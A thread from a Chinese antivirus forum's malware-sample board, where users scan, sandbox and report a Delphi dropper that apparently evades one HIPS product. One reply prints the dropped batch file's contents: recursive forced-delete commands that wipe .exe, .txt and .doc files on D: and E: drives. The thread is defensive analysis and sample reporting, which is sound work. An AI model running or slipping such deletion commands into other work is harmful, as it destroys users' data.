收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 微点勿试,其他上报!!
1234下一页
返回列表 发新帖
查看: 5297|回复: 38
收起左侧

[病毒样本] 微点勿试,其他上报!!

[复制链接]
tgzw1680
发表于 2009-2-25 22:47:36 | 显示全部楼层 |阅读模式
主流全部不认识,但是多引擎上报出来也都全部误报,都些什么引擎。。。。。。呵呵
这个东东说明了一个问题,微点的比hips更高的使用性上确实损失了很多安全。这类东西如果要想智能判断还需要思考更全面的东西。如果连最基本的文件保护都无法防御,确实不能说不是一种无奈。。。。。。。。。编辑下,免得别人说是微黑,呵呵,个人很喜欢微点的思路,老妈用的也是沸点组合。只是说明一个事实,不理智的人请勿回。。。。。

[ 本帖最后由 tgzw1680 于 2009-2-25 15:58 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

bbeikke
发表于 2009-2-25 22:50:27 | 显示全部楼层
没有敢试微点……
回复

举报

The EQs
发表于 2009-2-25 22:52:14 | 显示全部楼层
挺XE的
回复

举报

墨色丹青
发表于 2009-2-25 22:53:05 | 显示全部楼层
在虚拟机运行下就知道动作了...
没有扫描...家电脑用RS
感觉查不出来
回复

举报

ledled
发表于 2009-2-25 22:54:21 | 显示全部楼层
VirusBuster found nothing
回复

举报

328397663
发表于 2009-2-25 23:01:15 | 显示全部楼层
to kl
回复

举报

llydmissile
发表于 2009-2-25 23:04:52 | 显示全部楼层
To McAfee
回复

举报

Anycall-D908
发表于 2009-2-25 23:06:32 | 显示全部楼层
ProcessMonitor1.35看不出有什么问题哦.........是不是病毒啊?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Anycall-D908
发表于 2009-2-25 23:11:56 | 显示全部楼层
反病毒引擎版本最后更新扫描结果
a-squared4.0.0.932009.02.25Trojan-Dropper.Win32.Delf!IK
AhnLab-V32009.2.24.02009.02.25-
AntiVir7.9.0.882009.02.25-
Authentium5.1.0.42009.02.25W32/Dropper.MSH
Avast4.8.1335.02009.02.25-
AVG8.0.0.2372009.02.25-
BitDefender7.22009.02.25Trojan.Generic.664729
CAT-QuickHeal10.002009.02.25-
ClamAV0.94.12009.02.25Trojan.Spy.Banker-6239
Comodo9862009.02.20TrojWare.Win32.TrojanDropper.Delf.~AAAR
DrWeb4.44.0.091702009.02.25Trojan.StartPage.22094
eSafe7.0.17.02009.02.25-
eTrust-Vet31.6.63742009.02.25-
F-Prot4.4.4.562009.02.25W32/Dropper.MSH
F-Secure8.0.14470.02009.02.25-
Fortinet3.117.0.02009.02.25W32/Agent.AND!tr
GData192009.02.25Trojan.Generic.664729
IkarusT3.1.1.45.02009.02.25Trojan-Dropper.Win32.Delf
K7AntiVirus7.10.6472009.02.25Trojan-Dropper.Win32.QuickBatch.s
Kaspersky7.0.0.1252009.02.25-
McAfee55352009.02.24-
McAfee+Artemis55352009.02.24-
Microsoft1.43062009.02.25Trojan:Win32/Delfsnif.DT
NOD3238882009.02.25-
Norman6.00.062009.02.25-
nProtect2009.1.8.02009.02.25-
Panda10.0.0.102009.02.25-
PCTools4.4.2.02009.02.25-
Prevx1V22009.02.25High Risk Cloaked Malware
Rising21.18.22.002009.02.25-
SecureWeb-Gateway6.0.02009.02.25-
Sophos4.39.02009.02.25-
Sunbelt3.2.1856.22009.02.24-
Symantec102009.02.25-
TheHacker6.3.2.5.2652009.02.25-
TrendMicro8.700.0.10042009.02.25-
VBA323.12.10.02009.02.25Trojan.Win32.Delf.bpd
ViRobot2009.2.25.16232009.02.25-
VirusBuster4.5.11.02009.02.24-
回复

举报

The EQs
发表于 2009-2-25 23:12:23 | 显示全部楼层

回复 8楼 Anycall-D908 的帖子

绝对是的。。。。


eset下次升级添加特征码
回复

举报

Anycall-D908
发表于 2009-2-25 23:12:44 | 显示全部楼层
这么多都是误报?哎哟......完全看不懂,谁来救救我
回复

举报

tgzw1680
 楼主| 发表于 2009-2-25 23:14:43 | 显示全部楼层
其实不是病毒,病毒的定义首先是要自我复制,传染,感染破坏文件。这一类型只能算恶意程序
回复

举报

The EQs
发表于 2009-2-25 23:15:36 | 显示全部楼层

回复 12楼 tgzw1680 的帖子

有种木马叫做killfiles
回复

举报

黑衣~魂
发表于 2009-2-25 23:16:05 | 显示全部楼层
DR.WEB
Client.exe - infected with Trojan.StartPage.22094

EQ兄說的沒錯
光是TLS hooks: YES.就可以報後門了
Client.exe : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
   * Filename: C:\analyzer\scan\Client.exe.
   * Sandbox name: NO_MALWARE
   * Signature name: NO_VIRUS.
   * Compressed: NO.
   * TLS hooks: YES.
   * Executable type: Application.
   * Executable file structure: OK.
   * Filetype: PE_I386.

[ General information ]
   * File length:        69120 bytes.
   * MD5 hash: 29a2b93428347909dc8819c79dcfc3cd.

[ Changes to registry ]
   * Accesses Registry key "HKCU\Software\Borland\Locales".
   * Accesses Registry key "HKLM\Software\Borland\Locales".
   * Accesses Registry key "HKCU\Software\Borland\Delphi\Locales".

[ 本帖最后由 黑衣~魂 于 2009-2-25 23:20 编辑 ]
回复

举报

sjducker
发表于 2009-2-25 23:22:28 | 显示全部楼层
BitDefender 2009

This web page has been blocked by BitDefender Antivirus Real-time Protection!

The blocked web page included objects that were either infected or likely to be infected with a virus. Your system has NOT been infected.
回复

举报

Kitman
发表于 2009-2-25 23:22:54 | 显示全部楼层
to avira
回复

举报

baohelin
发表于 2009-2-25 23:30:39 | 显示全部楼层
client通过cmd.exe运行temp目录下随机数字名.bat。删除D、E盘根目录下的.exe、.txt、.doc文件。
.bat文件的内容:
@shift
del /f /s /q d:\*.exe
del /f /s /q e:\*.exe
del /f /s /q d:\*.txt
del /f /s /q e:\*.txt
del /f /s /q d:\*.doc
del /f /s /q e:\*.doc

并无太大恶意。作者只是给出个例子说明他的观点。
回复

举报

桃源梨花
发表于 2009-2-25 23:37:49 | 显示全部楼层
一个批处理,用Quick Batch File这玩意编译一下就称病毒?
回复

举报

Kitman
发表于 2009-2-26 00:02:06 | 显示全部楼层
The file 'Client.exe' has been determined to be 'MALWARE'. Our analysts discovered that the file is a Dropper. In general this kind of programs do not contain harmul functions by themselves. However they usually create other harmful programs and execute them right away. Detection will be added to our virus definition file (VDF) with one of the next updates.
回复

举报

saga3721
发表于 2009-2-26 00:07:27 | 显示全部楼层
为什么不删掉视频文件?这毒造成的破坏就是一张用来备份应用软件收集的DVD刻录盘搞定的事。
回复

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-3-15 06:36 , Processed in 0.087805 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表